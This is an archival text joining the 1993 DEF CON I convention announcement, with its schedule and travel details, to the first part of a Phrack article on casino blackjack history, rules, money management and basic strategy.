Your foray into the scene and your life will be forever incomplete if by some chance you miss out on DEF CON I. Plan to be there!

WHO: You know who you are.
WHAT: Super Blowout Party Fest, with Speakers and Activities.
WHERE: Las Vegas, Nevada
WHEN: July 9th, 10th and 11th (Fri, Sat, Sun) 1993
WHY: To meet all the other people out there you've been talking to for months and months, and get some solid information instead of rumors.

DESCRIPTION: So you're bored, and have never gone to a convention? You want to meet all the other members of the so called 'computer underground'?
You've been calling BBS systems for a long time now, and you definitely have been interacting on the national networks. You've bullshitted with the best, and now it's time to meet them in Vegas! For me I've been networking for years, and now I'll get a chance to meet everyone in the flesh. Get together with a group of your friends and make the journey. We cordially invite all hackers/phreaks, techno-rats, programmers, writers, activists, lawyers, philosophers, politicians, security officials, cyberpunks and all network sysops and users to attend. DEF CON I will be over the weekend in the middle of down town Las Vegas at the Sands Hotel. Why Las Vegas? Well the West Coast hasn't had a good Convention that I can remember, and Las Vegas is the place to do it. Cheap food, alcohol, lots of entertainment and, like us, it never sleeps. We will have a convention room open 24 hours so everyone can meet and plan and scheme till they pass out. Events and speakers will be there to provide distraction and some actual information and experiences from this loosely knit community. This is an initial announcement. It is meant only to alert you to the time, dates and location of the convention. Future announcements will inform you about specific speakers and events. An information pack is FTPable off of the internet at nwnexus.wa.com, in the cd/pub/dtangent directory. The IP# is 192.135.191.1 Information updates will be posted there in the future as well as scanned map images and updated speaker lists. FINAL NOTES: COST: How you get there is up to you, but United Airlines will be the official carrier (meaning if you fly you get a 5% to 10% price reduction off the cheapest available fare at the time of ticket purchase) When buying airline tickets, call 1-800-521-4041 and reference meeting ID# 540ii. Hotel Rooms will cost $62 per night for a double occupancy room. Get your friends together and split the cost to $31. Food is inexpensive. The entertainment is free inside the hotel. 
Reference the DEF CON I convention when registering, as we have a block of rooms locked out, but once they go it will be first come, first serve. Call 1-800-634-6901 for the reservations desk.

The convention itself will cost $30 at the door, or $15 in advance. It pays to register in advance! Also it helps us plan and cover expenses! Mail checks/money orders/cashiers checks to: DEF CON I, 2709 East Madison Street, #102, Seattle, WA, 98112. Make them payable to: "DEF CON". We're not trying to make money, we will be trying to cover costs of the conference room and hotel plus air fare for the speakers who require it. Don't bother mailing it a week in advance, that just won't happen. Advanced registration gets you a groovy 24 bit color pre-generated name tag. Include with your payment the name you want listed, your association/group affiliation/bbs/whatever, email address, and/or bbs number for sysops. Last day for the registrations to reach me will be July 1st.

SPEAKERS: We have solicited speakers from all aspects of the computer underground and associated culture (Law, Media, Software Companies, Cracking Groups, Hacking Groups, Magazine Editors, Etc.) If you know of someone interested in speaking on a self selected topic, please contact The Dark Tangent to discuss it.

FOR MORE INFORMATION: For initial comments, requests for more information, information about speaking at the event, or maps to the section where prostitution is legal outside Las Vegas (Just Kidding) Contact The Dark Tangent by leaving me mail at: dtangent@dtangent.wa.com on the InterNet. Or call: 0-700-TANGENT for conference information/updates and to leave questions or comments. Or Snail Mail (U.S. Postal Service) it to DEF CON, 2709 East Madison Street, #102, Seattle, WA, 98112.

Future information updates will pertain to the speaking agenda.

------------------------------------------------------------------------------

Updates since the last announcement:

>> The Secret Service is too busy to attend.
>> New Media Magazine, Unix World and Robert X. Cringly have stated they will attend.
>> We got a voice mail system working (I think) for comments and questions.
>> We don't have enough $$$ to fly out the EFF or Phillip Zimmerman (Author of PGP) or Loyd Blankenship.
>> Judy Clark will be representing the CPSR and a few other organizations

Don't forget to bring a poster / banner representing any of the groups you belong to. I want to cover the conference room walls with a display of all the various groups / people attending. (Break out the crayons and markers)

------------------------------------------------------------------------------

                         DEF CON I CONVENTION
            [PROPOSED SPEAKING SCHEDULE UPDATED 5.31.1993]

Saturday the 10th of July 10am, Sands Hotel, Las Vegas

INTRODUCTION            Welcome to the convention
                        *The Dark Tangent (CON Organizer)

Keynote speaker         Cyberspace, Society, crime and the future.
                        To hack or not to hack, that is not the question
                        *Ray Kaplan

Civil Libertarians
 -CPSR                  Computer Privacy/1st Amendment/Encryption
                        Gender Roles and Discrimination
                        *Judi Clark
 -USC Comp. Law         Legalities of BBS Operation, message content
                        laws and network concerns.
                        *Allen Grogan, Editor of Computer Lawyer

'The Underworld'
 -Networking            Concerns of National Networking of CCi
                        (Cyber Crime International) Network.
                        *Midnight Sorrow.

Corporations
 -Packet Switching      Concerns/security and the future
    SPRINT              of packet switching.
    MCI                 (*Jim Black, MCI Systems Integrity)

Misc                    Common misbeliefs and rumors of the underground
                        *Scott Simpson
 -Virtual Reality       The law, and its intersection with VR
                        *Karnow
 -Unix Security         Future developments in unix security software,
                        General Q&A on unix security
                        *Dan Farmer
 -System Administrator  Security Concerns of an Administrator
                        *Terminus

The 'Underworld'
 -Internet              The security problems with Internet/Networks
                        Overview of hacking
                        *Dark Druid
 -Getting Busted        The process of getting "busted"
                        *Count Zero
 -How to be a nobody    Hiding your identity in the high-tech future, or
                        The payphone is your friend.
                        *TBA-nonymous
 -The Prosecutors       Their concerns/problems and
  Hacker Hunters        suggestions for the 'underworld'/Q&A

CONCLUSION              General Q&A

This itinerary is proposed, and topics and speakers will be marked as permanent once a confirmation is received. This is by no means the exact format of DEF CON I. Any Questions / Comments Contact:

dtangent@dtangent.wa.com
Voice Mail 0-700-TANGENT

------------------------------------------------------------------------------

[> DEF CON I and United Airlines Travel Arrangements <]

United Airlines has been chosen as the official carrier for DEF CON I and is pleased to offer a 10% discount off the unrestricted BUA coach fare or a 5% discount off the lowest applicable fares, including first class. This special offer is available only to attendees of this meeting, and applies to travel on domestic segments of all United Airlines and United Express flights. A 5% discount off any fare is also available for attendees traveling to or from Canada in conjunction with your meeting. These fares are available through United's Meeting Desk with all fare rules and restrictions applying.

Help support the DEF CON I Conference by securing your reservations with United Airlines. To obtain the best fares or schedule information, please call United's Specialized Meeting Reservations Center at 1-800-521-4041.
Dedicated reservationists are on duty 7 days a week from 7:00 a.m. to 1:00 a.m. ET. Please be sure to reference ID number 540II. You or your travel agent should call today as seats may be limited. As a United Meeting attendee you qualify for special discount rates on Hertz rental cars. Mileage Plus members receive full credit for all miles flown to this meeting. Tickets will be mailed by United or you can pick them up at your local travel agency or United Airlines ticket office.

Generic update #1--- My system exploded, so it's been hard to keep in touch with everyone, but my mail response should be better now. Yep the conference is still on. A blown hard drive won't kill me. You can reach me for information or questions at 0-700-TANGENT (the DEF CON I hot line)

----- --
Sorry for the huge signature, but I like privacy on sensitive matters.

==Phrack Magazine==
Volume Four, Issue Forty-Three, File 9 of 27

How to "Hack" BlackJack
By Lex Luthor and The Legion of Gamblerz!! (LOG)
lex@mindvox.phantom.com (or) lex@stormking.com
Part 1 of 2 (50K)

BLURB: "I learned a lot of things I didn't know from Lex's File" ---Bruce Sterling

Introduction:
-------------

With the DEF CON 1 hacker/cyberpunk/law enforcement/security/etc convention coming up in Las Vegas, Nevada on July 9-12 1993, I felt that now would be a good time to write a "phile" on something the attendants could put to use to help legally defray the costs of going. The thought of a bunch of ex-hackers running around Las Vegas without shirts (having 'lost' them in the various Casinos) frightened me into immediate action.
Besides, I don't write articles on 'Underground' topics anymore and since I have done a lot of research and playing of Casino BlackJack, the CON in Vegas provided me the perfect excuse to finally write an article for PHRACK (not withstanding the pro-phile in Issue 40 which doesn't really count). Regardless of whether you go to this DEF CON 1 thing, if you ever plan to hit a casino with the purpose of MAKING MONEY, then you really should concentrate on ONE game of chance: BlackJack. Why? Because BlackJack is the *ONLY* casino game that affords the educated and skilled player a long-term mathematical advantage over the house. All the other casino games: Craps, Roulette, Slots, etc. have the long-term mathematical advantage over the player (see table below). BlackJack is also the only casino game for which the odds are always changing. Don't be fooled by all the glitter, a casino is a business and must make a profit to survive. The profit is ensured by using a set of rules which provides them with an edge. Now you say: wait a sec, how do they make money if BlackJack can be beaten? There are a couple of reasons. One reason is that there are very few good players who make it their profession to beat casinos at BlackJack day in and day out. There are many more who THINK they are good, THINK they know how to play the game, and lose more money than the really good players win. Notwithstanding the throngs of vacationers who admit to not being well versed in the game and consequently are doomed to lose...plenty. Another reason is that if a casino thinks you are a "counter" (a term just as nasty as "phreaker" to the phone company) there is a good chance that they will ask you to leave. See the section on Social Engineering the Casino to avoid being spotted as a counter. Also, the house secures its advantage in BlackJack from the fact that the player has to act first. If you bust, the dealer wins your bet regardless of whether the dealer busts later. 
The following table illustrates my point regarding house advantages for the various casino games and BlackJack strategies. The data is available in most books on casino gambling. Note that negative percentages denote player disadvantages and are therefore house advantages.

--------------------------------------------------------------------------
GAME                           Your Advantage (over the long run)
--------------------------------------------------------------------------
Craps                          -1.4 % overall average
Baccarat                       -1.1 % to -5.0 %
Roulette                       -2.7 % to -5.26 %
Slots                          -2.5 to -25 % depending on machine setting
Keno                           -25 % more or less
BlackJack (WAG Player)         -2 % to -15 %
BlackJack (Mirror Dealer)      -5.7 %
BlackJack (Basic Strategy)     -0.2 % to +0.3 %
BlackJack (Basic Strategy &    Up to +3.1 % depending on card counting
           Card Counting)      system and betting range.

A -2 % player advantage (2 percent disadvantage) means that if you play a hundred hands at a dollar each, then ON AVERAGE, you will lose two dollars. Note that the typical "pick three" State Lottery game is a disaster as your advantage is -50 %. If you make 1000 $1 bets, you will lose $500 on average. Some people say that state lotteries are taxation on the stupid...

This article contains thirteen sections. It was written in a fairly modular fashion so if there are sections which do not interest you, you may omit them without much loss in continuity however, all the sections are networked to some degree. For the sake of completeness, a fairly comprehensive list of topics has been presented. Due to email file size restrictions, I had to divide this article into two parts.

Note that I am NOT a Professional BlackJack player, the definition being someone whose livelihood is derived solely from his/her winnings. I did however, dedicate a summer to gambling 5 evenings a week or so, keeping meticulous records of wins, losses and expenses incurred.
I averaged 1-2 nights a week playing BlackJack with the other nights divided among 3 different forms of Pari-Mutuel gambling. At the end of the summer I tallied the wins/losses/expenses and am proud to say the result was a positive net earnings. Unfortunately it was instantly apparent that the net money when divided up by the number of weeks gambling was not enough to warrant me to quit school and become a professional gambler. Besides that one summer, I have played BlackJack off and on for 7 years or so. In case you were wondering, no, I have never been a member of GA [Gamblers Anonymous] contrary to what one of those Bell Security "Hit-Lists" circulated many years ago would have you believe.

The topics contained herein are:

o Historical Background of the BlackJack Card Game
o Useful Gambling, Casino, and BlackJack Definitions
o Review of BlackJack Rules of Play
o Betting, Money Management, and the Psychology of Gambling
o Basic Strategy (End of Part 1)
o Card Counting (Beginning of Part 2)
o Shuffle Tracking
o Casino Security and Surveillance
o "Social Engineering" the Casino
o Casino Cheating and Player Cheating
o Some Comments Regarding Computer BlackJack Games for PC's
o A VERY Brief Description of Other Casino Games
o Selected Bibliography and Reference List

Notes:

a) I made extensive use of my many books, articles, and magazines on gambling and BlackJack along with actual playing experience. References are denoted by square brackets [REF#] and are listed in the Selected Bibliography and Reference List section.

b) It's hard to win at something you don't understand. If you want to win consistently at anything, learn everything you can about it. BlackJack is no exception.

History of BlackJack:
---------------------

I provide this historical background information because I find it rather fascinating and it also provides some insight into contemporary rules and play.
I think it is worth reading for the sole reason that you might some day use one of the historical tid-bits to answer a question on Jeopardy!#@%! Seriously, the first couple of paragraphs may read a bit like a book report, but bear with it if you can as I did all of the following research specifically for this file. First, a brief history of cards: Playing cards are believed to have been invented in China and/or India sometime around 900 A.D. The Chinese are thought to have originated card games when they began shuffling paper money (another Chinese invention) into various combinations. In China today, the general term for playing cards means "paper tickets". The contemporary 52 card deck used in the U.S. was originally referred to as the "French Pack" (circa 1600's) which was later adopted by the English and subsequently the Americans. The first accounts of gambling were in 2300 B.C. or so, and yes, the Chinese again get the credit. Gambling was very popular in Ancient Greece even though it was illegal and has been a part of the human experience ever since. Today, with the all too common manipulation of language to suit one's own purposes, gambling is no longer a term used by casinos....they prefer to use the word GAMING instead. Just as Post Traumatic Stress Disorder has replaced the term Shell Shock in military jargon. Since this manipulation of language is all the rage these days, why don't we water down the name Computer Hacker and replace it with Misguided Information Junky or someone who is afflicted with a Compulsive Curiosity Disorder? The history of the BlackJack card game itself is still disputed but was probably spawned from other French games such as "chemin de fer and French Ferme", both of which I am completely unfamiliar with. BlackJack originated in French Casino's around 1700 where it was called "vingt-et-un" ("twenty-and- one" in French) and has been played in the U.S. since the 1800's. 
BlackJack is called Black-Jack because if a player got a Jack of Spades and an Ace of Spades as the first two cards (Spade being the color black of course), the player was additionally remunerated. Gambling was legal out West from the 1850's to 1910 at which time Nevada made it a felony to operate a gambling game. In 1931, Nevada re-legalized casino gambling where BlackJack became one of the primary games of chance offered to gamblers. As some of you may recall, 1978 was the year casino gambling was legalized in Atlantic City, New Jersey. As of 1989, only two states had legalized casino gambling. Since then, about 20 states have a number of small time casinos (compared to Vegas) which have sprouted up in places such as Black Hawk and Cripple Creek Colorado and in river boats on the Mississippi. Also as of this writing, roughly 70 Native American Indian reservations operate or are building casinos, some of which are in New York and Connecticut. In addition to the U.S., some of the countries (there are many) operating casinos are: France, England, Monaco (Monte Carlo of course) and quite a few in the Caribbean islands (Puerto Rico, Bahamas, Aruba, etc.). Now: The first recognized effort to apply mathematics to BlackJack began in 1953 and culminated in 1956 with a published paper [6]. Roger Baldwin et al (see Bibliography) wrote a paper in the Journal of the American Statistical Association titled "The Optimum Strategy in BlackJack". These pioneers used calculators, and probability and statistics theory to substantially reduce the house advantage. Although the title of their paper was 'optimum strategy', it wasn't really the best strategy because they really needed a computer to refine their system. I dug up a copy of their paper from the library, it is ten pages long and fairly mathematical. 
To give you an idea of its importance, the Baldwin article did for BlackJack playing what the November 1960 issue of The Bell System Technical Journal entitled, "Signalling Systems for Control of Telephone Switching", did for Blue Boxing. To continue with the analogy, one can consider Professor Edward O. Thorp to be the Captain Crunch of BlackJack. Dr. Thorp, then a mathematics teacher, picked up where Baldwin and company left off. In 1962, Thorp refined their basic strategy and developed the first card counting techniques. He published his results in "Beat the Dealer" [3], a book that became so popular that for a week in 1963 it was on the New York Times best seller list. The book also scared the hell out of the casinos. Thorp wrote "Beat the Market" in 1967, in which he used mathematics and computer algorithms to find pricing inefficiencies between stocks and related securities. Currently he is using an arbitrage formula to exploit undervalued warrants in the Japanese stock market.

The Casinos were so scared after Beat the Dealer, that they even changed the rules of the game to make it more difficult for the players to win. This didn't last long as people protested by not playing the new pseudo-BlackJack. The unfavorable rules resulted in a loss of income for the casinos. Not making money is a sin for a casino, so they quickly reverted back to the original rules. Because Thorp's "Ten-Count" method wasn't easy to master and many people didn't really understand it anyway, the casinos made a bundle from the game's newly gained popularity thanks to Thorp's book and all the media attention it generated.

Beat the Dealer is rather difficult to find these days; I picked up a copy at the library recently and checked the card in the back to see how popular it is today. I was surprised as hell to find that it was checked out over 20 times in the past year and a half or so! How many books from 1962 can claim that?
I do not recommend reading the book for anything other than posterity purposes though, the reason being that newer books contain better, and easier to learn strategies.

Another major contributor in the history of winning BlackJack play is Julian Braun who worked at IBM. His thousands of lines of computer code and hours of BlackJack simulation on IBM mainframes resulted in THE Basic Strategy, and a number of card counting techniques. His conclusions were used in a 2nd edition of Beat the Dealer, and later in Lawrence Revere's 1977 book "Playing BlackJack as a Business".

Lastly, let me mention Ken Uston, who used five computers that were built into the shoes of members of his playing team in 1977. They won over a hundred thousand dollars in a very short time but one of the computers was confiscated and sent to the FBI. The fedz decided that the computer used public information on BlackJack playing and was not a cheating device. You may have seen this story in a movie made about his BlackJack exploits detailed in his book "The Big Player". Ken was also featured on a 1981 Sixty Minutes show and helped lead a successful legal challenge to prevent Atlantic City casinos from barring card counters.

Useful Definitions:
-------------------

Just as in Social Engineering the Phone Company, an essential element for success is knowing the right buzzwords and acronyms. Therefore, I list some relevant definitions now, even though the reader will probably skip over them to get to the good stuff. The definitions merely serve as a reference for those who are uninitiated with the terminology of gambling, casinos, and BlackJack. If you encounter a term you don't understand in the article, look back here. The definitions are not in alphabetical order on purpose. I grouped them in what I feel is a logical and easy to remember fashion.

Action: This is a general gambling term which refers to the total amount of money bet in a specific period of time. Ten bets of ten dollars each is $100 of action.
Burn Card: A single card taken from the top of the deck or the first card in a shoe which the dealer slides across the table from his/her left to the right, and is placed into the discard tray. The card may or may not be shown face up (which can affect the count if you are counting cards). A card is burned after each shuffle. I have not been able to find out how this started nor the purpose for burning a card. If you know, drop me some email.
Cut Card: A solid colored card typically a piece of plastic which is given to a player by the dealer for the purpose of cutting the deck(s) after a shuffle. Cutting the cards in the 'right' location is part of the 'shuffle tracking' strategy mentioned later in Part 2.
Hole Card: Any face down card. The definition most often refers to the dealer's single face down card however.
Shoe: A device that can hold up to eight decks of cards which allows the dealer to slide out the cards one at a time.
Hard Hand: A hand in which any Ace is counted as a 1 and not as an 11.
Soft Hand: A hand in which any Ace is counted as an 11 and not as a 1.
Pat Hand: A hand with a total of 17 to 21.
Stand: To decline another card.
Hit: To request another card.
Bust: When a hand's value exceeds 21....a losing hand.
Push: A player-dealer tie.
Pair: When a player's first two cards are numerically identical (ie, 7,7).
Point Count: The net value of the card count at the end of a hand.
Running Count: The count from the beginning of the deck or shoe. The running count is updated by the value of the point count after each hand.
True Count: The running count adjusted to account for the number of cards left in the deck or shoe to be played.
Bankroll: The stake (available money) a player plans to bet with.
Flat Bet: A bet which you do not vary ie, if you are flat betting ten dollars, you are betting $10 each and every hand without changing the betting amount from one hand to the next.
Black Chip: A $100.00 chip.
Green Chip: A $25.00 chip.
Red Chip: A $5.00 chip.
Foreign Chip: A chip that is issued by one casino and is honored by another as cash. A casino is not necessarily obligated to accept them.
Settlement: The resolving of the bet. Either the dealer takes your chips, pays you, or in the case of a push, no exchange of chips occurs.
Toke: It's not what some of you may think...to "toke" the dealer is just another word for tipping the dealer.
Marker: An IOU. A line of credit provided by the casino to a player.
Junket: An organized group of gamblers that travel to a casino together. Junkets are usually subsidized by a casino to attract players.
Comp: Short for complimentary. If you wave lots of money around, the casino (hotel) may give you things like a free room or free f00d hoping you'll keep losing money at the tables in their casino.
Heat: The pressure a casino puts on a winning player, typically someone who is suspected of being a card counter.
Shuffle Up: Prematurely shuffling the cards to harass a player who is usually suspected of being a counter.
Nut: The overhead costs of running the casino.
Pit: The area inside a group of gaming tables. The tables are arranged in an elliptical manner, the space inside the perimeter is the pit.
House: The Casino of course.
Cage: Short for cashier's cage. This is where chips are redeemed for cash, checks cashed, credit arranged, etc.
House Percentage: The casino's advantage in a particular game of chance.
Drop Percentage: That portion of the player's money that the casino will win because of the house percentage. It is a measure of the amount of a player's initial stake that he or she will eventually lose. On average this number is around 20 percent. That is, on average, Joe Gambler will lose $20 of every $100 he begins with.
Head-On: To play alone at a BlackJack table with the dealer.
WAG Player: Wild Assed Guessing player.
SWAG Player: Scientific Wild Assed Guessing player.
Tough Player: What the casino labels an '3L33T' player who can hurt the casino monetarily with his or her intelligent play.
Counter: Someone who counts cards.
High Roller: A big bettor.
Mechanic: Someone who is elite in regards to manipulating cards, typically for illicit purposes.
Shill: A house employee who bets money and pretends to be a player to attract customers. Shills typically follow the same rules as the dealer which makes them somewhat easy to spot (ie, they don't Double Down or Split).
Pit Boss: An employee of the casino whose job is to supervise BlackJack players, dealers, and other floor personnel.

Review of BlackJack Rules of Play:
----------------------------------

The rules of BlackJack differ slightly from area to area and/or from casino to casino. For example, a casino in downtown Vegas may have different rules than one of the Vegas Strip casinos which may have different rules from a casino up in Reno or Tahoe (Nevada). The rules in a casino in Freeport Bahamas may differ from those in Atlantic City, etc. Therefore, it is important to research, a priori, what the rules are for the area/casino(s) you plan on playing in. For Nevada casinos you can order a copy of [1] which contains rules info on all the licensed casinos in the state. Later in this article, you will see that each set of rule variations has a corresponding Basic Strategy chart that must be memorized. Memorizing all the charts can be too confusing and is not recommended.

The BlackJack table seats a dealer and one to seven players. The first seat on the dealer's left is referred to as First Base, the first seat on the dealer's right is referred to as Third Base. A betting square is printed on the felt table in front of each player seat. Immediately in front of the dealer is the chip tray. On the dealer's left is the deck or shoe and beside that should be the minimum bet sign--something that you ought to read before sitting down to play.
On the dealer's immediate right is the money drop slot where all currency and tips (chips) are deposited. Next to the drop slot is the discard tray. Play begins after the following ritual is completed: the dealer shuffles the cards, the deck(s) is "cut" by a player using the marker card, and the dealer "burns" a card. Before any cards are dealt, the players may make a wager by placing the desired chips (value and number) into the betting box. I used the word "may" because you are not forced to bet every hand. Occasionally a player may sit out a hand or two for various reasons. I have sat out a couple of hands at times when the dealer was getting extremely lucky and everyone was losing. If you attempt to sit out too many hands especially if there are people waiting to play at your table, you may be asked to leave the table until you are ready to play. If you don't have any chips, put some cash on the table and the dealer will exchange them for chips. Once all the bets are down, two cards (one at a time) are dealt from left to right. In many Vegas casinos, players get both cards face down. In Atlantic City and most every where else the player's cards are dealt face up. Should the cards be dealt face up, don't make the faux pas of touching them! They are dealt face up for a reason, primarily to prevent a few types of player cheating (see section on cheating in Part 2) and the dealer will sternly but nicely tell you not to touch the cards. As most of you know the dealer receives one card down and one card up. The numerical values of the cards are: (10, J, Q, K) = 10 ; (Ace) = 1 or 11 ; (other cards) = face value (3 = 3). Since a casino can be as noisy as an old Step-by-Step Switch with all those slot machines going, marbles jumping around on roulette wheels, demoniacal shrieks of "YO-LEVEN" at the craps table, people screaming that they hit the big one and so on, hand signals are usually the preferred method of signalling hit, stand, etc. 
If the cards were dealt face down and you want a hit, lightly flick the cards across the felt two times. If the cards were dealt face up, point at the cards with a quick stabbing motion. You may also want to nod your head yes while saying "hit". The best way to indicate to the dealer that you want to stand regardless of how the cards were dealt is to move your hand from left to right in a level attitude with your palm down. Your hand should be a few inches or so above the table. Nodding your head no at the same time helps, while saying "stay" or "stand". Permit me to interject a comment on the number of decks used in a game. Single deck games are pretty much restricted to Nevada casinos. In the casinos that have one-deck games, the tables are usually full. Multiple deck games typically consist of an even number of decks (2, 4, 6, 8) although a few casinos use 5 or 7 decks. The two main reasons many casinos use multiple decks are: 1) They allow the dealer to deal more hands per hour thereby increasing the casino take. 2) They reduce but in no way eliminate the player advantage gained from card counting. Dealer Rules - The rules the dealer must play by are very simple. If the dealer's hand is 16 or less, he/she must take a card. If the dealer's hand is 17 or more, he/she must stand. Note that some casinos allow the dealer to hit on soft 17 which gives the house a very small additional advantage. The dealer's strategy is fixed and what you and the other players have is immaterial to him/her as far as hitting and standing is concerned. Player rules - The player can do whatever he/she wants as far as hitting and standing goes with the exception of the following special circumstances. See the section on Basic Strategy for the appropriate times to hit, stand, split, and double down. The aim is to have a hand which is higher than the dealers'. If there is a tie (push), neither you nor the dealer wins. 
Should a player get a BlackJack (first 2 cards are an Ace and a ten) the payoff is 150% of the original bet, ie, bet $10.00 and the payoff is $15.00.

DOUBLE DOWN: Doubling down is restricted to 2-card hands usually totalling 9, 10, or 11 although some casinos allow doubling down on any 2-card hand. If your first two cards provide you with the appropriate total and your cards were dealt face down, turn them over and put them on the dealer's side of the betting square. If your first two cards provide you with the appropriate total and your cards were dealt face up, point to them and say "double" when the dealer prompts you for a card and simultaneously put an equal amount of chips NEXT TO (not on top of) those already in the betting box. The dealer will give you one more card only, then he/she will move on to the next hand.

SPLITTING PAIRS: If you have a pair that you want to split and your cards are dealt face down, turn them over and place them a few inches apart. If your cards were dealt face up, point to your cards and say "split" when the dealer prompts you for a card. The original bet will go with one card and you will have to place an equal amount of chips in the betting box near the other card. You are now playing two hands, each as though they were regular hands, the exception being when you have just split two aces. In that case, you only get one card which will hopefully be a 10. If it is a ten, that hand's total is now 21 but the hand isn't considered a BlackJack. That is, you are paid 1:1 and not 1:1.5 as for a natural (BlackJack).

Combined example of above two plays: Say you are dealt two fives. You split them (you dummy!). The next card is another 5 and you re-split them (you chucklehead!!). Three hands have grown out of one AND you are now in for three times your original bet. But wait. Say the next card is a six. So one hand is a 5,6 which gives you eleven; another just has a 5 and the other hand has a 5.
You decide to double down on the first hand. You are dealt a 7 giving 18 which you stand on. Now a ten is dealt for the second hand and you decide to stay at 15. The last hand is the lonely third 5, which is dealt a four for a total of nine. You decide to double down and get an eight giving that hand a total of 17. Shit you say, you started with a twenty dollar bet and now you are in for a hundred! Better hope the dealer doesn't end up with a hand more than 18 lest you lose a C-note. The moral of this example is to not get caught up in the excitement and make rash decisions. However, there have been a couple of times where Basic Strategy dictated that certain split and double down plays should be made and I was very low on chips (and cash). Unless you are *really* psychic, don't go against Basic Strategy! I didn't and usually came out the better for it although I was really sweating the outcome of the hand due to my low cash status. The reason it was stupid to split two fives is that you are replacing a hand that is great for drawing on or doubling down on, by what will probably be two shitty hands. INSURANCE: This option comes into play when the dealer's up card is an Ace. At this point all the players have two cards. The dealer does not check his/her hole card before asking the players if they want insurance. The reason being evident as the dealer can't give away the value of the hole card if the dealer doesn't know what the hole card is. If a player wants insurance, half the original amount bet is placed on the semicircle labeled "insurance" which is printed on the table. If the dealer has a BlackJack the player wins the side bet (the insurance bet) but loses the original bet, thus providing no net loss or gain since insurance pays 2 to 1. If the dealer does not have a BlackJack, the side bet is lost and the hand is played normally. If you are not counting cards DO NOT TAKE INSURANCE! The proper Basic Strategy play is to decline. 
The time to take insurance is when the ratio of non-tens to tens drops below 2 to 1, since insurance pays 2 to 1. It's simple math; check it yourself.

SURRENDER: This is a fairly obscure option that originated in Manila (Philippines) in 1958 and isn't available in many casinos. There are two versions, "early surrender" and "late surrender". Early surrender allows players to quit two-card hands after seeing the up card of the dealer. This option provides the player an additional 0.62 percent favorable advantage (significant), which is the obvious reason why many Atlantic City casinos abandoned the option in 1982. Late surrender is the same as early except that the player must wait until the dealer checks for a BlackJack. If the dealer does not have a BlackJack then the player may surrender. The following table was taken verbatim from [5] and is valid for games with 4+ decks. It details the best strategy regarding late surrender as determined from intensive computer simulation:

     TWO-CARD HAND        TOTAL        DEALER'S UP-CARD
     -------------        -----        ----------------
          9,7              16                ACE
         10,6 *            16 *              ACE
          9,7 *            16 *              10
         10,6 *            16 *              10
          9,7 *            16 *              10
         10,5 *            15 *              10
          9,7              16                9
         10,5              16                9

"In a single-deck game, you would surrender only the above hands marked with an asterisk, as well as 7,7 against a dealer's 10 up-card." [5]

Casino variations - Note that some casinos do not permit doubling down on split pairs, and/or re-splitting pairs. These options provide the player with a slight additional advantage.


Betting, Money Management, and the Psychology of Gambling:
----------------------------------------------------------

Let me begin this section with the following statement: SCARED MONEY RARELY WINS.

Most gambling books devote quite a bit of time to the psychology of gambling and rightfully so. There is a fine line to responsible gambling. On one hand you shouldn't bet money that you cannot afford to lose.
On the other hand, if you are betting with money you expect to lose, where is your confidence? When I used to gamble, it was small time. I define small time as bringing $250.00 of 'losable' money. I've lost that much in one night. I didn't like it, but I still ate that week. One pitfall you can easily fall into happens AFTER you lose. You scold yourself for losing money you could have done something productive with. "DAMN, I could have bought a 200 MB hard drive with that!#&!". You should think about these things BEFORE you play. Scared money is more in the mind than real. What I mean by that is even if you gamble with your last $10.00 in the world, it is important to play as though you have thousands of dollars in front of you. I don't mean piss the ten bucks away. I mean that there are certain plays you should make according to your chosen strategy which are the optimum mathematically. Don't make changes to it out of fear. Fear is not your friend. The "risk of ruin" is the percent chance that you will lose your entire bankroll. This percentage should not exceed 5% if you plan on playing multiple sessions to make money. The risk of ruin is dependent on the sizes of your bets during a session. The "Kelly Criterion" provides a zero percent risk of ruin. The system requires that you bet according to the percent advantage you have at any one time. For example, if you are counting cards and your advantage for a certain hand is 2% then you may bet 2% of your total bankroll. If your total is $1000. then you can bet $20. Note that if you won the hand your bankroll is now $1020 and if your advantage dropped to 1.5%, taking .015 times 1020 (which will determine your next bet size) in your head isn't all that easy. The literature provides more reasonable systems, but do yourself a favor and stay away from "betting progressions". See Reference [16] (available on the Internet) for more information regarding risk of ruin & optimal wagers. 
If you are gambling to make money, it is important to define how much cash you can lose before quitting. This number is called the "stop-loss limit". My stop-loss limit was my entire session bankroll which was $250 (50 betting units of $5.00 or 25 betting units of $10.00). This concept is especially important if you expect to play in the casinos for more than one session. Most books recommend that your session bankroll be about a fifth of your trip bankroll. Unfortunately, most people who have $500 in their wallet with a self-imposed stop-loss limit of $200 will violate that limit should they lose the two hundred. Discipline is what separates the great players from the ordinary ones.

Obviously you don't want to put a limit on how much you want to win. However, if you are keeping with a structured system there are certain limits to what your minimum and maximum bets should be. I am not going to go into that here though.

In my gambling experience, there has been one non-scientific concept that has proven itself over and over again. NEVER BUCK A TREND! If you have just won three hands in a row, don't think that you are now 'due' for a loss and drastically scale back your bet. If you are winning go with it. A good friend of mine who was my 'gambling mentor' won $30,000 in a 24 hour period with a $200 beginning bankroll. This was not accomplished by scaling back bets. By the same token, if you see that the players at a certain table are losing consistently, don't sit down at that table.

One problem that I've seen is when someone has won a lot and starts to lose. Mentally, they keep saying, "if I lose another $100 I will stop". They lose the hundred and say "no, really, the NEXT $100 I lose, I will stop", etc. When they go broke, that's when they stop. Live by the following graph typically designated as The Quitting Curve and you won't fall into that trap:

          |                          *               <-+
          |                        *   *               | Loss
      ^   |                      *       *             | Limit
      |   |                    *           * <----QUIT!  <-+
      |   |                  *
      W   |                *
      i   |              *
      n   |            *
      n   |          *
      i   |        *
      n   |      *
      g   |    *
          |
          |_________________________________________
                       Time ---------------->

Determine your loss limit and stay with it. Obviously the loss limit will change as you keep winning. Standard loss limits are 10 to 20 percent of the current bankroll. Note that this philosophy is also used in stock market speculation.


Basic Strategy:
---------------

If you only read one section of this file, and you don't already know what Basic Strategy is, then this is the section you should read. Knowing Basic Strategy is CRITICAL to you gaining an advantage over the house. The Basic Strategy for a particular set of rules was developed by intensive computer simulation which performed a complete combinatorial analysis. The computer "played" tens of thousands of hands for each BlackJack situation possible and statistically decided as to which play decision favored the player. The following 3 charts should be duplicated or cut out from a hardcopy of this file. You don't want to wave them around at a BlackJack table but it's nice to have them on hand in case you fail to recall some plays, at which time you can run to the rest room to refresh your memory.

